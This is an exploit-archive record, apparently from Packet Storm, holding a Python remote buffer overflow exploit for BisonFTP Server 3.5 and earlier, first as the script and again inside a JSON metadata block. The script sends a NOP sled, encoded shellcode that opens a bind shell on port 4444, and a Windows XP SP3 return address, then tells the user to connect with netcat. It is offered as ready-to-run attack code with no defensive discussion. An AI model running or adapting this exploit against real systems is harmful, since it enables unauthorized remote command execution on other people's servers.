ID PACKETSTORM:103896
Type packetstorm
Reporter localh0t
Modified 2011-08-11T00:00:00
Description
`#!/usr/bin/python
# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit
# Newer version's not tested, maybe vulnerable too
# written by localh0t
# Date: 10/08/11
# Contact: mattdch0@gmail.com
# Follow: @mattdch
# www.localh0t.com.ar | www.mfsec.com.ar
# Thanks to: Pr0zac, Irakirashia, Kchito
# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish)
# Shellcode: List shell on port 4444 (Change as you wish)
from socket import *
import sys, struct, os, time
if (len(sys.argv) < 3):
print "\nBisonFTP Server <=v3.5 Remote Buffer Overflow Exploit"
print "\n Usage: %s <host> <port> \n" %(sys.argv[0])
sys.exit()
print "\n[!] Connecting to %s ..." %(sys.argv[1])
# connect to host
sock = socket(AF_INET,SOCK_STREAM)
sock.connect((sys.argv[1],int(sys.argv[2])))
sock.recv(1024)
time.sleep(5)
# padding
buffer = "\x90" * 1092
# 368 bytes shellcode
buffer += ("\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"+
"\xbb\xc1\x9c\x35\x83\xee\xfc\xe2\xf4\x47\x29\x15\x35\xbb\xc1"+
"\xfc\xbc\x5e\xf0\x4e\x51\x30\x93\xac\xbe\xe9\xcd\x17\x67\xaf"+
"\x4a\xee\x1d\xb4\x76\xd6\x13\x8a\x3e\xad\xf5\x17\xfd\xfd\x49"+
"\xb9\xed\xbc\xf4\x74\xcc\x9d\xf2\x59\x31\xce\x62\x30\x93\x8c"+
"\xbe\xf9\xfd\x9d\xe5\x30\x81\xe4\xb0\x7b\xb5\xd6\x34\x6b\x91"+
"\x17\x7d\xa3\x4a\xc4\x15\xba\x12\x7f\x09\xf2\x4a\xa8\xbe\xba"+
"\x17\xad\xca\x8a\x01\x30\xf4\x74\xcc\x9d\xf2\x83\x21\xe9\xc1"+
"\xb8\xbc\x64\x0e\xc6\xe5\xe9\xd7\xe3\x4a\xc4\x11\xba\x12\xfa"+
"\xbe\xb7\x8a\x17\x6d\xa7\xc0\x4f\xbe\xbf\x4a\x9d\xe5\x32\x85"+
"\xb8\x11\xe0\x9a\xfd\x6c\xe1\x90\x63\xd5\xe3\x9e\xc6\xbe\xa9"+
"\x2a\x1a\x68\xd3\xf2\xae\x35\xbb\xa9\xeb\x46\x89\x9e\xc8\x5d"+
"\xf7\xb6\xba\x32\x44\x14\x24\xa5\xba\xc1\x9c\x1c\x7f\x95\xcc"+
"\x5d\x92\x41\xf7\x35\x44\x14\xcc\x65\xeb\x91\xdc\x65\xfb\x91"+
"\xf4\xdf\xb4\x1e\x7c\xca\x6e\x48\x5b\x04\x60\x92\xf4\x37\xbb"+
"\xd0\xc0\xbc\x5d\xab\x8c\x63\xec\xa9\x5e\xee\x8c\xa6\x63\xe0"+
"\xe8\x96\xf4\x82\x52\xf9\x63\xca\x6e\x92\xcf\x62\xd3\xb5\x70"+
"\x0e\x5a\x3e\x49\x62\x32\x06\xf4\x40\xd5\x8c\xfd\xca\x6e\xa9"+
"\xff\x58\xdf\xc1\x15\xd6\xec\x96\xcb\x04\x4d\xab\x8e\x6c\xed"+
"\x23\x61\x53\x7c\x85\xb8\x09\xba\xc0\x11\x71\x9f\xd1\x5a\x35"+
"\xff\x95\xcc\x63\xed\x97\xda\x63\xf5\x97\xca\x66\xed\xa9\xe5"+
"\xf9\x84\x47\x63\xe0\x32\x21\xd2\x63\xfd\x3e\xac\x5d\xb3\x46"+
"\x81\x55\x44\x14\x27\xc5\x0e\x63\xca\x5d\x1d\x54\x21\xa8\x44"+
"\x14\xa0\x33\xc7\xcb\x1c\xce\x5b\xb4\x99\x8e\xfc\xd2\xee\x5a"+
"\xd1\xc1\xcf\xca\x6e\xc1\x9c\x35")
# more padding
buffer += "\x90" * 8
# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled)
buffer += "\x9a\x5c\x3c\x7e"
# end connection
buffer += "\x0a"
# send buffer
print "[!] Sending exploit..."
sock.send(buffer)
sock.recv(1024)
sock.close()
print "[!] Exploit succeed. Now netcat %s on port 4444\n" %(sys.argv[1])
sys.exit()
`
{"id": "PACKETSTORM:103896", "type": "packetstorm", "bulletinFamily": "exploit", "title": "BisonFTP Server 3.5 Buffer Overflow", "description": "", "published": "2011-08-11T00:00:00", "modified": "2011-08-11T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/103896/BisonFTP-Server-3.5-Buffer-Overflow.html", "reporter": "localh0t", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:39", "viewCount": 8, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/103896/bisonftp-overflow.txt", "sourceData": "`#!/usr/bin/python \n# BisonFTP Server <=v3.5 Remote Buffer Overflow Exploit \n# Newer version's not tested, maybe vulnerable too \n# written by localh0t \n# Date: 10/08/11 \n# Contact: mattdch0@gmail.com \n# Follow: @mattdch \n# www.localh0t.com.ar | www.mfsec.com.ar \n# Thanks to: Pr0zac, Irakirashia, Kchito \n# Targets: Windows XP SP3 Spanish (No DEP) (Change as you wish) \n# Shellcode: List shell on port 4444 (Change as you wish) \n \nfrom socket import * \nimport sys, struct, os, time \n \nif (len(sys.argv) < 3): \nprint \"\\nBisonFTP Server <=v3.5 Remote Buffer Overflow Exploit\" \nprint \"\\n Usage: %s <host> <port> \\n\" %(sys.argv[0]) \nsys.exit() \n \nprint \"\\n[!] Connecting to %s ...\" %(sys.argv[1]) \n \n# connect to host \nsock = socket(AF_INET,SOCK_STREAM) \nsock.connect((sys.argv[1],int(sys.argv[2]))) \nsock.recv(1024) \ntime.sleep(5) \n \n# padding \nbuffer = \"\\x90\" * 1092 \n \n# 368 bytes shellcode \nbuffer += (\"\\x33\\xc9\\x83\\xe9\\xaa\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\"+ \n\"\\xbb\\xc1\\x9c\\x35\\x83\\xee\\xfc\\xe2\\xf4\\x47\\x29\\x15\\x35\\xbb\\xc1\"+ \n\"\\xfc\\xbc\\x5e\\xf0\\x4e\\x51\\x30\\x93\\xac\\xbe\\xe9\\xcd\\x17\\x67\\xaf\"+ \n\"\\x4a\\xee\\x1d\\xb4\\x76\\xd6\\x13\\x8a\\x3e\\xad\\xf5\\x17\\xfd\\xfd\\x49\"+ \n\"\\xb9\\xed\\xbc\\xf4\\x74\\xcc\\x9d\\xf2\\x59\\x31\\xce\\x62\\x30\\x93\\x8c\"+ \n\"\\xbe\\xf9\\xfd\\x9d\\xe5\\x30\\x81\\xe4\\xb0\\x7b\\xb5\\xd6\\x34\\x6b\\x91\"+ \n\"\\x17\\x7d\\xa3\\x4a\\xc4\\x15\\xba\\x12\\x7f\\x09\\xf2\\x4a\\xa8\\xbe\\xba\"+ \n\"\\x17\\xad\\xca\\x8a\\x01\\x30\\xf4\\x74\\xcc\\x9d\\xf2\\x83\\x21\\xe9\\xc1\"+ \n\"\\xb8\\xbc\\x64\\x0e\\xc6\\xe5\\xe9\\xd7\\xe3\\x4a\\xc4\\x11\\xba\\x12\\xfa\"+ \n\"\\xbe\\xb7\\x8a\\x17\\x6d\\xa7\\xc0\\x4f\\xbe\\xbf\\x4a\\x9d\\xe5\\x32\\x85\"+ \n\"\\xb8\\x11\\xe0\\x9a\\xfd\\x6c\\xe1\\x90\\x63\\xd5\\xe3\\x9e\\xc6\\xbe\\xa9\"+ \n\"\\x2a\\x1a\\x68\\xd3\\xf2\\xae\\x35\\xbb\\xa9\\xeb\\x46\\x89\\x9e\\xc8\\x5d\"+ \n\"\\xf7\\xb6\\xba\\x32\\x44\\x14\\x24\\xa5\\xba\\xc1\\x9c\\x1c\\x7f\\x95\\xcc\"+ \n\"\\x5d\\x92\\x41\\xf7\\x35\\x44\\x14\\xcc\\x65\\xeb\\x91\\xdc\\x65\\xfb\\x91\"+ \n\"\\xf4\\xdf\\xb4\\x1e\\x7c\\xca\\x6e\\x48\\x5b\\x04\\x60\\x92\\xf4\\x37\\xbb\"+ \n\"\\xd0\\xc0\\xbc\\x5d\\xab\\x8c\\x63\\xec\\xa9\\x5e\\xee\\x8c\\xa6\\x63\\xe0\"+ \n\"\\xe8\\x96\\xf4\\x82\\x52\\xf9\\x63\\xca\\x6e\\x92\\xcf\\x62\\xd3\\xb5\\x70\"+ \n\"\\x0e\\x5a\\x3e\\x49\\x62\\x32\\x06\\xf4\\x40\\xd5\\x8c\\xfd\\xca\\x6e\\xa9\"+ \n\"\\xff\\x58\\xdf\\xc1\\x15\\xd6\\xec\\x96\\xcb\\x04\\x4d\\xab\\x8e\\x6c\\xed\"+ \n\"\\x23\\x61\\x53\\x7c\\x85\\xb8\\x09\\xba\\xc0\\x11\\x71\\x9f\\xd1\\x5a\\x35\"+ \n\"\\xff\\x95\\xcc\\x63\\xed\\x97\\xda\\x63\\xf5\\x97\\xca\\x66\\xed\\xa9\\xe5\"+ \n\"\\xf9\\x84\\x47\\x63\\xe0\\x32\\x21\\xd2\\x63\\xfd\\x3e\\xac\\x5d\\xb3\\x46\"+ \n\"\\x81\\x55\\x44\\x14\\x27\\xc5\\x0e\\x63\\xca\\x5d\\x1d\\x54\\x21\\xa8\\x44\"+ \n\"\\x14\\xa0\\x33\\xc7\\xcb\\x1c\\xce\\x5b\\xb4\\x99\\x8e\\xfc\\xd2\\xee\\x5a\"+ \n\"\\xd1\\xc1\\xcf\\xca\\x6e\\xc1\\x9c\\x35\") \n \n# more padding \nbuffer += \"\\x90\" * 8 \n \n# jmp edx (shell32.dll Windows XP SP3 Spanish) (edx points to the 1st nopsled) \nbuffer += \"\\x9a\\x5c\\x3c\\x7e\" \n \n# end connection \nbuffer += \"\\x0a\" \n \n# send buffer \nprint \"[!] Sending exploit...\" \nsock.send(buffer) \nsock.recv(1024) \nsock.close() \nprint \"[!] Exploit succeed. Now netcat %s on port 4444\\n\" %(sys.argv[1]) \nsys.exit() \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645415987}}
{}